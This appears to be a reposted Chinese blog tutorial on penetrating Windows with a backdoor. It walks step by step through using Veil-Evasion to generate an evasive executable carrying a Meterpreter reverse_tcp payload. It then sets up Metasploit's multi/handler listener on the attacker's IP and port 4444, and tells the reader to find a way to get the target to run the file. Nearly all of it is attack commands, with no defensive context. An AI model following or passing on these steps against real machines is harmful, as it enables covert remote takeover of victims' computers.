本文主要是介绍Metasploit使用后门程序渗透Windows,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
终端中运行 veil-evasion
输入list查看可用模块
这里使用 7) c/shellcode_inject/flatc
输入 use 7
generate
1 (default)
回车选择默认的 windows/meterpreter/reverse_tcp
tab 选择本地IP 也可以自己输入指定IP
端口 用默认的 4444
回车 回车
Generating shellcode... 等待
指定 文件名
/usr/share/veil-output/compiled/ 在此位置找到所生成的exe文件 想方法使目标机运行
启动msf (msfconsole)
加载exploit/multi/handler模块: use exploit/multi/handler
设定 payload: set payload windows/meterpreter/reverse_tcp
show options 查看所需设置的参数
set LHOST 你的IP (需与 veil操作中所指定的IP相同)
exploit 开始监听
设置本地主机;然后开始监听:exploit -z -j :
这篇关于Metasploit使用后门程序渗透Windows的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!